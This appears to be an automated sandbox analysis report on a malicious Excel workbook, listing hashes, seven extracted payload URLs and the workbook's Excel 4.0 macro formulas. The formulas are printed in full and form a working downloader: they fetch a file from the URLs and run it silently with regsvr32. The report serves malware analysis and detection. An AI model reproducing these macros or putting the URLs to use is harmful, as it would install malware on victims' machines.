General
-
Target
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
Size
33KB
-
Sample
240909-12gfsasfpj
-
MD5
325803f2534dac63d8d714da437fad96
-
SHA1
e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe
-
SHA256
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
SHA512
72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b
-
SSDEEP
768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5
Static task
static1
Behavioral task
behavioral1
Sample
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
https://damjangro.org/data/IlBcH2mM/
https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
https://www.awam.be/wp-admin/ug9Zz/
https://protokol.mx/Archivos/SjKWNoeYre/
https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
https://bengtverhoef.nl/stats/SJ1csD7/
-
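formulas (Excel 4.0 macro formulas extracted from the workbook, shown on one line: each CALL uses urlmon's URLDownloadToFileA to save one of the URLs listed above to the relative path ..\wnru.ocx; the first CALL is unconditional and the rest are gated on cells of sheet 'HUNJK'; the EXEC entry then passes that file to the SysWow64 regsvr32.exe with -s. Host-side indicators visible here: the wnru.ocx file name and a regsvr32.exe process started from the spreadsheet.)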
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Targets
-
-
Target
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
Size
33KB
-
MD5
325803f2534dac63d8d714da437fad96
-
SHA1
e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe
-
SHA256
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
SHA512
72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b
-
SSDEEP
768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5
Score 3/10